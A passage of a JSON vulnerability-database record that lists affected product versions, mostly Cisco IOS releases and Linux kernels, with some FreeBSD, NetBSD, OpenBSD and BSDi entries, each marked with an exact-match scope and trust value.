          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "3.3"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "1.6.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(17\\)sl6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0xw"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.17.12"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(15\\)s6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)mc2c"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2zg"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.9"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(2a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(22\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.20"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)sv"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)xq"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(1b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)t9"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1ez"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)xl"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xi2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(8\\)"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1yf"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2xj"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(14\\)yu1"
          },
          {
            "_id": null,
            "model": "bsd os",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "bsdi",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(26b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2ya"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(2\\)jk1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.60"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(10\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)sxe3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(7\\)dc1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(16\\)s8a"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(19\\)fc1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(4\\)ea1e"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(17d\\)sxb7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2xc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)sxe"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(24\\)sv"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xa"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.28"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2xu"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.43"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.18.4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xf"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(11a\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.16"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(16\\)w5\\(21\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(31\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.15"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.38"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.14.4"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.10"
          },
          {
            "_id": null,
            "model": "trustedbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "trustedbsd",
            "version": null
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1yi"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(6\\)ez1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(10\\)s3b"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2ym"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(26\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)dd3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.62"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(8b\\)e16"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.24"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xe"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(11\\)yp1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.15.6"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.40"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)xv5"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.12.6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(10g\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.36"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(13\\)ay"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "1.5.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(1\\)xd4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(1\\)dx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)sw4"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.17.6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(26a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2cz"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(13\\)e13"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3bw"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.65"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xa"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.17.5"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.20.4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0xb"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(8\\)yg"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)xk"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(7\\)sc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(23\\)e4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2mb"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2zd"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)ya1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yz"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.25"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(8\\)ja"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.11.5"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "4.5"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "4.8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3jec"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.15.1"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xg"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1ea"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.54"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)xw1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0wc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1xq"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)t8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2sy"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(7\\)xr6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2sec"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.45"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.23.9"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(23a\\)bc1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(9\\)ia"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2zc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)ys1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.19"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.31"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2da"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(17\\)zd3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.15.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(9\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)yd6"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.33"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.21"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.41"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(10c\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)bc1a"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(4\\)xaf"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(7a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)sv3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2x"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)xg5"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.5"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.36"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4xg"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(8\\)sa3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2ey"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)t1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(7\\)wx5\\(15a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(27\\)sv1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(2\\)xa"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.37"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(10\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(20\\)eo3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5c\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1xh"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)t15"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(26\\)sv1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(14\\)za8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)xl"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.14"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "3.4"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.6"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "5.5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(12g\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.26"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(2\\)xa5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1ev"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(18\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(8\\)yh"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(12c\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.23"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(7b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(6\\)ea2b"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2sxf"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1aa"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "4.9"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.50"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(23\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)xg5"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.36"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(20\\)eo1"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)wc3b"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2yy"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13\\)zd3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.17.4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(14\\)sz2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(1c\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(7\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(2\\)xc2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2xz"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(1\\)xe2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.44"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.22"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.24"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.3\\(11b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(3\\)dc2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.3"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "2.1.7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.3\\(1\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(11b\\)e14"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(20\\)s4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)dc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3tpc"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "1.3.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(28a\\)ct"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2yc"
